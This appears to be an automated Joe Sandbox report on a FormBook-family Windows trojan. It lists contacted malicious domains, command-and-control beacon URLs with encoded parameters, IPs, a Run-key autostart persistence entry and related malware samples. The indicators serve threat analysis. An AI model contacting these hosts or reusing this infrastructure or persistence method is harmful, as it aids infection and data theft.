                                                                              https://onedrive.live.com/download?resid=D2FF5C6240820574%21465&authkey=Telragab.PIF, 0000000B.00000002.2688655343.0000000002B85000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.kuis-raja-borong.websiteReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.transip.nl/services/search-domains/explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.microexplorer.exe, 00000005.00000000.2331503846.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2331530357.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324920937.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.canwealljustagree.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  http://www.maltsky.net/ao65/www.thnkotb.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  http://www.harmonicod.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.ecofare.xyzexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://naopta.bn.files.1drv.com:443/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeDTelragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.optimusvisionlb.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.ecofare.xyz/ao65/www.iokgw1.topexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: phishing
                                                                                    		unknown
                                                                                    http://www.kuis-raja-borong.websiteexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.oaistetic.com/ao65/explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      http://www.stellarskyline.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://transip.nl/cp/explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://live.com/?Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.optimusvisionlb.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.leathfortexas.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://live.com/(Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.canwealljustagree.com/ao65/www.ecofare.xyzexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.stellarskyline.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.leathfortexas.com/ao65/www.ouxodb001.cfdexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://www.maltsky.net/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://naopta.bn.files.1drv.com/y4mWheWVd_ulVA7I3cjlifsQ_hjAjUwAiOhs_rGTjyEnBf6dISBKjP9LuUpM-ahNhLDTelragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.thnkotb.com/ao65/www.harmonicod.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  37.97.254.27
                                                                                                  		kermisbedrijfkramer.onlineNetherlands
                                                                                                  		20857TRANSIP-ASAmsterdamtheNetherlandsNLtrue
                                                                                                  104.247.81.50
                                                                                                  		www.harmonicod.comCanada
                                                                                                  		206834TEAMINTERNET-CA-ASCAtrue
                                                                                                  62.72.50.88
                                                                                                  		stellarskyline.comGermany
                                                                                                  		5427PRTL-DEtrue
                                                                                                  34.93.103.39
                                                                                                  		optimus-vision.odoo.comUnited States
                                                                                                  		15169GOOGLEUSfalse
                                                                                                  3.33.130.190
                                                                                                  		leathfortexas.comUnited States
                                                                                                  		8987AMAZONEXPANSIONGBtrue
                                                                                                  156.237.159.158
                                                                                                  		www.hivaom.topSeychelles
                                                                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                  104.140.89.24
                                                                                                  		www.maltsky.netUnited States
                                                                                                  		62904EONIX-COMMUNICATIONS-ASBLOCK-62904UStrue

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:38.0.0 Ammolite
                                                                                                  Analysis ID:1350545
                                                                                                  Start date and time:2023-11-30 14:55:10 +01:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 11m 4s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:17
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:1
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample file name:Fpopgapwdcgvxn.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.winEXE@294/7@13/7
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 98%
                                                                                                  • Number of executed functions: 80
                                                                                                  • Number of non-executed functions: 331
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12, 20.42.65.92
                                                                                                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, bn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-bn-files-brs.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, odc-bn-files-geo.onedrive.akadns.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  14:56:10API Interceptor1x Sleep call for process: Fpopgapwdcgvxn.exe modified
                                                                                                  14:56:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Telragab C:\Users\Public\Telragab.url
                                                                                                  14:56:23API Interceptor6959065x Sleep call for process: explorer.exe modified
                                                                                                  14:56:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Telragab C:\Users\Public\Telragab.url
                                                                                                  14:56:39API Interceptor2x Sleep call for process: Telragab.PIF modified
                                                                                                  14:56:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                  14:57:06API Interceptor7415516x Sleep call for process: rundll32.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  37.97.254.27Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                                                                  PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
                                                                                                  25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
                                                                                                  PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • www.qa-manny.com/cvps/?ojQxW=_LZhZtRhEB2XP&-Lkxp=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.wrautomotive.online/fdo5/?7F=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&zf7=WxIPUXb0
                                                                                                  Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • www.kermisbedrijfkramer.online/ao65/?Urwl=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&S0GhC=_R-phJeXT
                                                                                                  INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.qa-manny.com/cvps/?kDuhz=t6NP562HYH_&pf5=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                                                                  137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                                                  • www.rocsys.net/g81o/?t8F43Dx=Xpn7ovWGDL38rcQsVj9M+fSKcj+67g3pDTSuqHneUyb3n+qAvdqStutd5ioDJ87L1Kdi6p0jXbywk+j2nUztgIlZl1ilwP64qP32EII=&xphPK=azPpsjMX1
                                                                                                  NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.rocsys.net/uaaq/?w89D=LxmD0p&UX=ZvgtLzuC5J0fwHYxUOhDE7BocrPe2y3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09mUhv++5catqsVQ==
                                                                                                  003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
                                                                                                  Document.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
                                                                                                  Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
                                                                                                  Invoice.exeGet hashmaliciousUnknownBrowse
                                                                                                  • www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
                                                                                                  Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
                                                                                                  PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.carfactsandfigures.com/gpc9/?pfD=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoQOkRQ9xiXX9HyxRaD3/mCeI&28=XrcXTyOAOYd9aU4
                                                                                                  Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.carfactsandfigures.com/gpc9/?Qw=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoWCpUiVji2f5FixRaDjUrieI&Cq=oXbgvbGl
                                                                                                  Zpe3AgLpIk.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.detail.tips/ug0e/?g3=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmn4WmFlEKCSmNHQ==&aRz=TnxvzmvvZHhQa
                                                                                                  cOqo5PZFXC.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.detail.tips/ug0e/?T6N6=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzfuiO2sKUmKBQ8Ki8GsnQXiV&a23=vQfnLmKSaoS
                                                                                                  qeUNNruKMS.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.detail.tips/ug0e/?xGgP0=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzYXgBkUxTDmNB8Ki8FQ2d3iV&Ck=YjGWWgtgIy
                                                                                                  FedEx Shipment doc.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.detail.tips/ug0e/?uTe=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzYXgBkUxTDmNB8Ki8FQ2d3iV&C6qk1=WsHtTdU

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  www.hivaom.top9008654324456.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 156.237.159.158
                                                                                                  003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 156.237.159.158
                                                                                                  Domgxpvqtdfgvx.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 156.237.159.158
                                                                                                  Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 156.237.159.158
                                                                                                  Tcnpdxsfourrbk.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 156.237.159.158
                                                                                                  www.maltsky.netTcnpdxsfourrbk.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 104.140.89.24

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  PRTL-DEmZoYf6Nezj.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 62.72.62.121
                                                                                                  new_order_C00382023.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 62.72.50.8
                                                                                                  9008654324456.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 62.72.50.88
                                                                                                  RFQ_034-3105-Ashworth.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 62.72.50.8
                                                                                                  wsxK69ydcg.dllGet hashmaliciousJanelaRATBrowse
                                                                                                  • 62.72.22.134
                                                                                                  wsxK69ydcg.dllGet hashmaliciousJanelaRATBrowse
                                                                                                  • 62.72.22.134
                                                                                                  x8TRXHYzP6.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 62.72.50.217
                                                                                                  New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 62.72.37.54
                                                                                                  SecuriteInfo.com.FileRepMalware.2839.30700.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 62.72.28.110
                                                                                                  New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 62.72.37.54
                                                                                                  about.md.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 62.72.22.30
                                                                                                  up.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 62.72.22.30
                                                                                                  md.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 62.72.22.30
                                                                                                  8.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 62.72.22.30
                                                                                                  Purchase_Order.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 62.72.50.34
                                                                                                  Quote_Request.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 62.72.37.60
                                                                                                  bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 62.72.27.201
                                                                                                  bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 62.72.27.201
                                                                                                  bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 62.72.27.201
                                                                                                  bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 62.72.27.201
                                                                                                  TEAMINTERNET-CA-ASCAfile.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                  • 104.247.82.52
                                                                                                  http://lightenacquired.xyzGet hashmaliciousUnknownBrowse
                                                                                                  • 104.247.82.51
                                                                                                  http://lightenacquired.xyzGet hashmaliciousUnknownBrowse
                                                                                                  • 104.247.82.51
                                                                                                  Payment_$5,860.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.91
                                                                                                  G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                                                                                  • 104.247.81.53
                                                                                                  Statement_Pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.91
                                                                                                  https://cookiescriptcdn.proGet hashmaliciousUnknownBrowse
                                                                                                  • 104.247.81.210
                                                                                                  Order_QR-00658.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.92
                                                                                                  THP-20381508-2023NP.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.91
                                                                                                  svcVJ3Ljwp.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.90
                                                                                                  RFQ-T56797W.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.90
                                                                                                  SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.14213.13511.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.92
                                                                                                  https://rj2bocejarqnpuhm.browsetor.comGet hashmaliciousUnknownBrowse
                                                                                                  • 104.247.81.51
                                                                                                  hRdqscagvv.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.247.82.94
                                                                                                  Scan.0893700083-SSG803.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.247.82.93
                                                                                                  Bhl9bymdkI.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.247.82.94
                                                                                                  GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.247.82.51
                                                                                                  R56wchKh1g.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 104.247.82.90
                                                                                                  Quote_Request.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.247.82.91
                                                                                                  Hgh7WMRLzKPX09P.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.247.82.90
                                                                                                  TRANSIP-ASAmsterdamtheNetherlandsNLProduct_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 37.97.254.27
                                                                                                  PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 37.97.254.27
                                                                                                  PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                  • 37.97.254.27
                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 95.170.75.142
                                                                                                  Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 185.211.251.125
                                                                                                  F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 37.97.214.109
                                                                                                  INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 95.170.75.168
                                                                                                  NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 37.97.254.27
                                                                                                  003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  Document.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 37.97.254.27
                                                                                                  ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 95.170.75.197
                                                                                                  sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 149.210.216.118
                                                                                                  RF_-_ORDER_8990387_REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 86.105.245.69
                                                                                                  arm.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 149.210.216.117
                                                                                                  ACH Remittance Statement on October 17 2023 at 023544 AM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 136.144.209.194

                                                                                                  JA3 Fingerprints

                                                                                                  No context

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Telragab.PIF_cd7ef5a2dc1b4e7443fc1fa25c3269aae2ef6f4_6406e3d8_80c3d30a-2e8b-49e2-b895-67a018884a02\Report.wer

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.0904543046591975
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:9nFBpOykjsghhoI7Jf7QXIDcQvc6QcEVcw3cE/ME/+HbHgnoW6He4sFEh5Lk4Mb9:183jg0BU/AjUFLcUl3zuiF1Z24IO8o
                                                                                                  MD5:A0FA6046F81A9B088F25EDB1B8056C6A
                                                                                                  SHA1:D3F14291D15657E76785C11955C89307CCE65D6F
